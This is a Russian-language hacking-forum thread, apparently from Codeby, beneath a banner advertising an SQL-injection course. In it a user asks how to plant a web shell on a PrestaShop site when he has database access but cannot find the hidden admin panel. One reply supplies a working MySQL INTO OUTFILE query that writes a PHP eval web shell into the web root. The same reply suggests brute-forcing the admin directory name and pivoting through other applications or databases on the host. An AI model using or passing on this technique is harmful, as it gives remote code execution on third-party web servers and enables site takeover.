• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

PrestaShop шелл

r0t0r

r0t0r

New member
21.11.2019
1
0
BIT
0
Господа, кто-нибудь знает или умеет лить шелл на PrestaShop без доступа к админке, но с доступом к бд мускула?
Поковырял CMS-ку - разрабы знатно заморочились с тем чтоб припрятать админку. При установке генерится рандомный набор символов, который добавляется к названию директории с админкой, в итоге получается что-то типа admin7381k7ayeu. Этот набор символов ни в каком месте больше не светится, ни в бд ни в файлах.
 
Сортировать по дате Сортировать по голосам
M

massdie98

Member
04.12.2019
9
0
BIT
0
1) При условии что есть file_priv=y у пользователя базы и ты знаешь полный путь куда лить будешь файл + там есть права на запись и mysql стоит на том же сервере. Запросом вроде

Код: 
SELECT "<?php eval($_GET['code']); ?>" into outfile "/var/www/codeby/yatvoyshell.php"

2) Посмотри алг как генерируется в движке имя этой папки, попробуй пробрутить.
3) Другие приложения на хосте? Доступ к другим базам?
 
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ